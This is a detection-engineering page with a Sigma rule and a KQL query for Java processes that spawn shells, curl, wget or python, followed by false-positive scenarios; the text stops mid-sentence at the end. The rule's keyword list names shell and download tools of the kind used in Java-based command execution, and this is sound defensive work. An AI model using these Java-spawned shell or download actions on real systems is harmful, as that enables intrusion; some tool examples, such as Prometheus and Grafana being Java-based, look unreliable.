Adversaries may use Java processes to spawn suspicious child processes as part of command and control or payload execution. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential malware or persistent access mechanisms leveraging Java-based attack vectors.
Detection Rule
title: Suspicious Java Children Processes
id: d292e0af-9a18-420c-9525-ec0ac3936892
status: test
description: Detects java process spawning suspicious children
references:
- https://www.tecmint.com/different-types-of-linux-shells/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith: '/java'
CommandLine|contains:
- '/bin/sh'
- 'bash'
- 'dash'
- 'ksh'
- 'zsh'
- 'csh'
- 'fish'
- 'curl'
- 'wget'
- 'python'
condition: selection
falsepositives:
- Unknown
level: high
imProcessCreate
| where (ParentProcessName endswith "/java" or ActingProcessName endswith "/java") and (TargetProcessCommandLine contains "/bin/sh" or TargetProcessCommandLine contains "bash" or TargetProcessCommandLine contains "dash" or TargetProcessCommandLine contains "ksh" or TargetProcessCommandLine contains "zsh" or TargetProcessCommandLine contains "csh" or TargetProcessCommandLine contains "fish" or TargetProcessCommandLine contains "curl" or TargetProcessCommandLine contains "wget" or TargetProcessCommandLine contains "python")Scenario: A system administrator is running a scheduled backup job using java -jar backup-tool.jar which legitimately spawns a child process to compress files with gzip.
Filter/Exclusion: Exclude processes where the parent is a known backup tool or where the child process is gzip and the parent process name contains “backup”.
Scenario: A developer is using java to run a test harness that spawns a child process to execute a unit test using junit or mvn test.
Filter/Exclusion: Exclude processes where the parent is a test framework (e.g., mvn, junit, testng) and the child process is a known testing tool.
Scenario: A DevOps pipeline is using java to run a CI/CD job that spawns a child process to execute a script via bash or sh for deployment.
Filter/Exclusion: Exclude processes where the parent is a CI/CD tool (e.g., jenkins, gitlab-runner, github-actions) and the child process is a known scripting interpreter.
Scenario: A system is running a Java-based monitoring tool (e.g., Prometheus, Grafana, Zabbix) that spawns a child process to collect metrics using curl or snmp.
Filter/Exclusion: Exclude processes where the parent is a known monitoring tool and the child process is a known metric collection utility (e.g., curl, snmpwalk).
Scenario: A Java-based application is using ProcessBuilder to invoke a legitimate system utility (e.g., find, grep, rsync) for data processing.
Filter/Exclusion: Exclude processes where the child process is a known system utility and the parent process is a known application (e.g., rsync, `find